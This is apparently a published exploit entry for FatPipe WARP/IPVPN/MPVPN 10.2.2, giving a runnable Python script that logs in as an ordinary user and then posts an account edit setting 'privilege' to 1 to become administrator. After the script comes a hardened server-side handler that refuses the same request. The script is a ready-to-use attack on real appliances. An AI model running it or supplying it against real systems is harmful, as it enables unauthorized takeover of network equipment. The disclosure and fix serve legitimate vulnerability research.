# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com

#!/usr/bin/env python3
#
# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
#
#
# Vendor: FatPipe Networks Inc.
# Product web page: https://www.fatpipeinc.com
# Affected version: WARP / IPVPN / MPVPN
#                   10.2.2r38
#                   10.2.2r25
#                   10.2.2r10
#                   10.1.2r60p82
#                   10.1.2r60p71
#                   10.1.2r60p65
#                   10.1.2r60p58s1
#                   10.1.2r60p58
#                   10.1.2r60p55
#                   10.1.2r60p45
#                   10.1.2r60p35
#                   10.1.2r60p32
#                   10.1.2r60p13
#                   10.1.2r60p10
#                   9.1.2r185
#                   9.1.2r180p2
#                   9.1.2r165
#                   9.1.2r164p5
#                   9.1.2r164p4
#                   9.1.2r164
#                   9.1.2r161p26
#                   9.1.2r161p20
#                   9.1.2r161p17
#                   9.1.2r161p16
#                   9.1.2r161p12
#                   9.1.2r161p3
#                   9.1.2r161p2
#                   9.1.2r156
#                   9.1.2r150
#                   9.1.2r144
#                   9.1.2r129
#                   7.1.2r39
#                   6.1.2r70p75-m
#                   6.1.2r70p45-m
#                   6.1.2r70p26
#                   5.2.0r34
#
# Summary: FatPipe Networks invented the concept of router-clustering,
# which provides the highest level of reliability, redundancy, and speed
# of Internet traffic for Business Continuity and communications. FatPipe
# WARP achieves fault tolerance for companies by creating an easy method
# of combining two or more Internet connections of any kind over multiple
# ISPs. FatPipe utilizes all paths when the lines are up and running,
# dynamically balancing traffic over the multiple lines, and intelligently
# failing over inbound and outbound IP traffic when ISP services and/or
# components fail.
#
# FatPipe IPVPN balances load and provides reliability among multiple
# managed and CPE based VPNs as well as dedicated private networks. FatPipe
# IPVPN can also provide you an easy low-cost migration path from private
# line, Frame or Point-to-Point networks. You can aggregate multiple private,
# MPLS and public networks without additional equipment at the provider's
# site.
#
# FatPipe MPVPN, a patented router clustering device, is an essential part
# of Disaster Recovery and Business Continuity Planning for Virtual Private
# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
# 300% times more reliable, redundant and faster. MPVPN can take WANs with
# an uptime of 99.5% or less and make them 99.999988% or higher, providing
# a virtually infallible WAN. MPVPN dynamically balances load over multiple
# lines and ISPs without the need for BGP programming. MPVPN aggregates up
# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
# you need to keep your VPN up and running despite failures of service, line,
# software, or hardware.
#
# Desc: The application suffers from a privilege escalation vulnerability.
# A normal user (group USER, 0) can elevate her privileges by sending an HTTP
# POST request and setting the JSON parameter 'privilege' to integer value
# '1', gaining administrative rights (group ADMINISTRATOR, 1). The server
# trusts the group value supplied in the request body instead of the group
# of the authenticated session.
#
# Tested on: Apache-Coyote/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5685
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
#
#
# 30.05.2016
# 25.07.2021
#
#

import sys
import time
import requests

requests.packages.urllib3.disable_warnings()

if len(sys.argv) != 2:
    print()
    print("********************************************************")
    print("*                                                      *")
    print("* Privilege escalation from USER to ADMINISTRATOR role *")
    print("*                          in                          *")
    print("*           FatPipe WARP/IPVPN/MPVPN v10.2.2           *")
    print("*                                                      *")
    print("*                    ZSL-2021-5685                     *")
    print("*                                                      *")
    print("********************************************************")
    print("\n[POR] Usage: ./escalator.py [IP]")
    sys.exit()

ajpi = sys.argv[1]  # target host or IP
print()
juzer = input("[UNE] Username: ")
pasvord = input("[UNE] Password: ")
sesija = requests.session()

# Step 1: log in with the supplied low-privileged (USER) credentials.
logiranje = {'loginParams': '{\"username\":\"' + juzer + '\",\"password\":\"' + pasvord + '\",\"authType\":0}'}
hederi = {
    'Sec-Ch-Ua': '\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
    'Accept': 'application/json, text/javascript, */*; q=0.01',
    'X-Requested-With': 'XMLHttpRequest',
    'Sec-Ch-Ua-Mobile': '?0',
    'User-Agent': 'Fatnet/1.b',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'Origin': 'https://' + ajpi,
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Dest': 'empty',
    'Referer': 'https://' + ajpi + '/fpui/dataCollectionServlet',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9',
    'Connection': 'close'
}
juarel1 = 'https://' + ajpi + '/fpui/loginServlet'
alo = sesija.post(juarel1, headers=hederi, data=logiranje, verify=False)
if 'success' not in alo.text:
    print('[GRE] Login error.')
    sys.exit()
else:
    print('[POR] Authentication successful.')
    print('[POR] Climbing the ladder...')
sluba = '''
     ||    ||                .--._
     ||====||         __    '---._)
     ||    ||        "")\   Q  Q  )
     ||====||        =_/    o/
     ||    ||        |  \_.-;-'-,._
     ||====||        |'o---o   )
     ||    ||        \  /H __H\/
     ||====||         '-' \"")\/|
     ||    ||          _ |_='-)_/
     ||====||         /'.)
     ||    ||        /  /
     ||====||       |___/\|  /
     ||    ||           |_|| |
     ||====||           /)\\ \\
     ||    ||          (__/\___\\
     ||====||               \_\\
     ||    ||                /)
     ||====||               (__/
'''
for k in sluba:  # draw the ladder one character at a time
    sys.stdout.write(k)
    sys.stdout.flush()
    time.sleep(0.01)
# Step 2: re-submit the user's own account record with 'privilege' set to 1
# (ADMINISTRATOR); the server applies the group from the request body.
juarel2 = 'https://' + ajpi + '/fpui/userServlet?loadType=set&block=userSetRequest'
posta = {'userList': '[{\"userName\":\"' + juzer + '\",\"oldUserName\":\"' + juzer + '\",\"privilege\":\"1\",\"password\":\"' + pasvord + '\",\"action\":\"edit\",\"state\":false}]'}
stanje = sesija.post(juarel2, headers=hederi, data=posta, verify=False)
if 'true' not in stanje.text:
    print('\n[GRE] Something\'s fishy!')
    sys.exit()
else:
    print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
sys.exit()
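The Desc above comes down to a missing server-side authorization check: the userSetRequest handler takes the 'privilege' field from the request body at face value. The following is an added illustration of how such a handler should decide, written for this advisory and not FatPipe's code; it assumes a hypothetical in-memory account table and a server-side session record that carries the caller's own group, and replays a constructed copy of the userList body the PoC sends.

```python
import json

USER, ADMINISTRATOR = 0, 1          # group ids as named in the advisory

class Forbidden(Exception):
    """Raised when the authorization check rejects the request."""

def apply_user_set_request(session, user_list_json, accounts):
    """Hardened handling of the userSetRequest block (hypothetical).
    session: server-side record {"username": str, "privilege": 0|1}, never
    taken from the body.  user_list_json: the 'userList' form field as the
    UI sends it.  accounts: {name: {"privilege": int}} (constructed table).
    Returns the names that were updated."""
    changed = []
    for entry in json.loads(user_list_json):
        target = entry.get("oldUserName") or entry["userName"]
        if target not in accounts:
            raise Forbidden("unknown user %r" % target)
        current = accounts[target]["privilege"]
        # The UI sends "1" as a string; a missing field means "unchanged".
        requested = int(entry.get("privilege", current))
        is_admin = session["privilege"] == ADMINISTRATOR
        is_self = target == session["username"]
        if not is_admin and not is_self:
            raise Forbidden("USER may only edit its own account")
        if requested != current and (not is_admin or is_self):
            # A group change is honoured only when an administrator edits
            # somebody else; nobody can change their own group.
            raise Forbidden("group change for %r refused" % target)
        accounts[target]["privilege"] = requested
        changed.append(target)
    return changed

def demo():
    """Replay the PoC's request body (constructed copy) as a plain USER."""
    accounts = {"alice": {"privilege": USER}, "root": {"privilege": ADMINISTRATOR}}
    session = {"username": "alice", "privilege": USER}
    body = json.dumps([{"userName": "alice", "oldUserName": "alice",
                        "privilege": "1", "password": "secret",
                        "action": "edit", "state": False}])
    try:
        apply_user_set_request(session, body, accounts)
        outcome = "escalated"
    except Forbidden as exc:
        outcome = "refused: %s" % exc
    return outcome, accounts["alice"]["privilege"]

if __name__ == "__main__":
    print(demo())
```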